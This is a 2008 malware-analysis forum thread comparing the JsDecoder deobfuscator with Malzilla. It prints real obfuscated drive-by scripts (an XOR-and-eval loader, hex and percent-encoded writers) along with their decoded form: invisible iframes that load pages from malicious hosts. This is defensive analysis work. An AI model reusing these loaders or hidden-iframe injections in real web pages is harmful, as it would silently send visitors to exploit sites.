Author Topic: JsDecoder  (Read 3489 times)


May 09, 2008, 09:21:54 pm

sowhat-x

Here's the 'demo' to play around with...
http://code.gosu.pl/dl/JsDecoder/demo/JsDecoder.html

And here are the sources as well, licensed under the GPL...  :)
http://code.gosu.pl/dl/JsDecoder/JsDecoder-1.1.0.zip

May 11, 2008, 11:24:29 pm
Reply #1

MysteryFCM

I set this loose on the scripts from;

http://www.malwaredomainlist.com/forums/index.php?topic=1749.0

... and alas, it could only handle the basic decoding (it reformatted the code but left the encoded payloads as they were) ..... I gave it;

Code: [Select]
// Input sample 1 (as submitted, minified): cgocban() maps each character of its
// argument through the lookup table t (index = char code - 48), packs the 6-bit
// table values into bytes, XORs every byte with 195 and passes each decoded
// chunk (up to 1024 input characters) to eval().
function cgocban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,28,46,15,47,32,60,8,48,16,0,0,0,0,0,0,59,9,5,23,30,19,55,21,53,50,25,3,1,13,62,49,29,39,0,54,11,40,41,24,34,4,58,0,0,0,0,22,0,18,17,7,6,57,20,12,45,10,2,52,51,27,35,42,56,26,38,14,43,61,33,44,37,31,36);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(195^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}cgocban('koqtQIihhK@hXDth8Z3ecIqtrasNQIiUSZoVhDm@kdtoFqZZz04oxdtU2qZphiotrZ4u@TqUnKmw5ZyptD@hlr3@wK0owj@h8S2oh_itwyT@6EsZsiZhtSDwwqmtQ22nXD@ohctUhDit222ZVc06IE0NonseS44UvasZzcNpkoZVF2o0IE46n4oVoaZoFZ46I40p8Dt24qo0vyoo8s@tXomNhIqtrdD00l2oxdtU2qq0zts')
// Input sample 2 (as submitted): v4826fd0dd3c0e() is parseInt() with radix 16
// (the radix is returned by a nested function), v4826fd0dd99b1() turns a hex
// string into text two digits at a time, and the result is passed to
// document.write(). The hex string begins 3C5343524950543E, i.e. "<SCRIPT>".
function v4826fd0dd3c0e(v4826fd0dd65c2){ function v4826fd0dd8b4b () {return 16;} return(parseInt(v4826fd0dd65c2,v4826fd0dd8b4b()));}function v4826fd0dd99b1(v4826fd0dd9d9f){  var v4826fd0dda1b5='';for(v4826fd0dda590=0; v4826fd0dda590<v4826fd0dd9d9f.length; v4826fd0dda590+=2){ v4826fd0dda1b5+=(String.fromCharCode(v4826fd0dd3c0e(v4826fd0dd9d9f.substr(v4826fd0dda590, 2))));}return v4826fd0dda1b5;} document.write(v4826fd0dd99b1('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D303039643831313232207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3639343236292B27633433316562655C272077696474683D343036206865696768743D313731207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
// Input sample 3 (as submitted): three document.writeln(unescape(...)) calls.
// Each percent-encoded string starts %3c%49%46%52%41%4d%45 ("<IFRAME") and carries
// style='display: none', so the frames are written to the page invisibly.
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%61%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%34%38%32%35%31%37%39%30%27%20%77%69%64%74%68%3d%33%31%37%20%68%65%69%67%68%74%3d%34%37%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%66%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%35%39%37%31%34%38%33%32%27%20%77%69%64%74%68%3d%33%35%32%20%68%65%69%67%68%74%3d%35%35%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%64%61%32%38%66%33%62%32%65%38%62%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%38%32%38%38%29%2b%27%35%31%32%27%20%77%69%64%74%68%3d%35%36%32%20%68%65%69%67%68%74%3d%34%32%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );

.... and it returned;

Code: [Select]
/**
 * Decoder stub from the first sample, as reformatted by JsDecoder.
 *
 * Each input character is translated through the table t (index = char code
 * minus 48) to a value of at most 63. The values are packed low bits first:
 * the bit offset s cycles 0, 6, 4, 2, so four input characters yield three
 * output bytes. Every output byte is XORed with 195. Input is consumed in
 * chunks of up to 1024 characters, and the text decoded from each chunk is
 * passed to eval().
 *
 * @param {string} x - the encoded payload string.
 */
function cgocban(x)
{
    // l: input characters still to consume; b: chunk size; p: read position in x;
    // s: current bit offset in w; w: bit accumulator; t: character translation table.
    var l = x.length, b = 1024, i, j, r, p = 0, s = 0, w = 0, t = Array(63, 28, 46, 15, 47, 32, 60, 8,
    48, 16, 0, 0, 0, 0, 0, 0, 59, 9, 5, 23, 30, 19, 55, 21, 53, 50, 25, 3, 1, 13, 62, 49, 29, 39, 0, 54,
    11, 40, 41, 24, 34, 4, 58, 0, 0, 0, 0, 22, 0, 18, 17, 7, 6, 57, 20, 12, 45, 10, 2, 52, 51, 27, 35,
    42, 56, 26, 38, 14, 43, 61, 33, 44, 37, 31, 36);
    // One outer pass per chunk of up to b input characters; p, s and w carry over
    // from one chunk to the next.
    for (j = Math.ceil(l / b); j > 0; j--)
    {
        // r collects the decoded text of the current chunk only.
        r = '';
        for (i = Math.min(l, b); i > 0; i--, l--)
        {
            {
                // Translate the next character and OR its value into w at bit offset s.
                w |= (t[x.charCodeAt(p++) - 48]) << s;
                if (s) {
                    // A full byte is buffered. & binds tighter than ^, so this is
                    // 195 ^ (w & 255): the low byte of w XORed with the constant 195.
                    r += String.fromCharCode(195^w & 255);
                    w >>= 8;
                    s -= 2
                }
                else {
                    // Only six bits are buffered; no byte is emitted for this character.
                    s = 6;
                }
            }
        }
        // NOTE(review): the decoded chunk is executed here. Capturing r at this
        // point instead of evaluating it yields the payload text for analysis.
        eval(r);
    }
}
// NOTE(review): JsDecoder's output puts the cgocban(...) call and the following
// function declaration on one line with nothing between them; in the submitted
// input they sit on separate lines.
cgocban('koqtQIihhK@hXDth8Z3ecIqtrasNQIiUSZoVhDm@kdtoFqZZz04oxdtU2qZphiotrZ4u@TqUnKmw5ZyptD@hlr3@wK0owj@h8S2oh_itwyT@6EsZsiZhtSDwwqmtQ22nXD@ohctUhDit222ZVc06IE0NonseS44UvasZzcNpkoZVF2o0IE46n4oVoaZoFZ46I40p8Dt24qo0vyoo8s@tXomNhIqtrdD00l2oxdtU2qq0zts') function v4826fd0dd3c0e(v4826fd0dd65c2)
{
    // v4826fd0dd3c0e parses its argument as a base-16 number. The radix is
    // supplied by the nested function below instead of a literal 16 at the
    // parseInt() call.
    function v4826fd0dd8b4b ()
    {
        return 16;
    }
    return (parseInt(v4826fd0dd65c2, v4826fd0dd8b4b()));
}
/**
 * Hex-to-text helper of the second sample: walks the argument two characters
 * at a time, converts each pair with v4826fd0dd3c0e() and appends the
 * character with that code to the result.
 *
 * @param {string} v4826fd0dd9d9f - hex digits, two per output character.
 * @returns {string} the decoded text.
 */
function v4826fd0dd99b1(v4826fd0dd9d9f)
{
    var v4826fd0dda1b5 = '';
    // The loop counter is assigned without a declaration in this listing, so it
    // is created as an implicit global.
    for (v4826fd0dda590 = 0; v4826fd0dda590 < v4826fd0dd9d9f.length; v4826fd0dda590 += 2)
    {
        v4826fd0dda1b5 += (String.fromCharCode(v4826fd0dd3c0e(v4826fd0dd9d9f.substr(v4826fd0dda590, 2))));
    }
    return v4826fd0dda1b5;
}
// The hex argument is left encoded by JsDecoder. It begins 3C5343524950543E
// ("<SCRIPT>"); Malzilla's output later in this post shows the decoded text, a
// script that sets window.status and document.write()s an iframe styled
// display: none.
document.write(v4826fd0dd99b1('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D303039643831313232207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3639343236292B27633433316562655C272077696474683D343036206865696768743D313731207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
// The three unescape() arguments are also left encoded. Each starts
// %3c%49%46%52%41%4d%45 ("<IFRAME") and carries style='display: none'.
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%61%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%34%38%32%35%31%37%39%30%27%20%77%69%64%74%68%3d%33%31%37%20%68%65%69%67%68%74%3d%34%37%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%66%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%35%39%37%31%34%38%33%32%27%20%77%69%64%74%68%3d%33%35%32%20%68%65%69%67%68%74%3d%35%35%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
// The third string embeds '+Math.round(Math.random()*238288)+' inside the encoded
// markup. The decoded text is written as HTML rather than run as script, so the
// expression is not evaluated; Malzilla's output shows it verbatim.
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%64%61%32%38%66%33%62%32%65%38%62%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%38%32%38%38%29%2b%27%35%31%32%27%20%77%69%64%74%68%3d%35%36%32%20%68%65%69%67%68%74%3d%34%32%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );

:(

Malzilla, however, returns;

Code: [Select]
window.status='Done';document.write('<iframe name=58ab src="http://3hosts.info/t/?'+Math.round(Math.random()*20178)+'58ab'+'" width=171 height=118 style="display:none"></iframe>')<SCRIPT>window.status='Done';document.write('<iframe name=009d81122 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*69426)+'c431ebe\' width=406 height=171 style=\'display: none\'></iframe>')</SCRIPT>
<IFRAME name=a5 src='http://tapki.cn/1.html?48251790' width=317 height=476 style='display: none'></IFRAME>
<IFRAME name=3f src='http://tapki.cn/1.html?59714832' width=352 height=556 style='display: none'></IFRAME>
<IFRAME name=da28f3b2e8b5 src='http://tapki.cn/1.html?'+Math.round(Math.random()*238288)+'512' width=562 height=424 style='display: none'></IFRAME>

So definitely not as good as Malzilla, but could be useful if it's improved ........
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net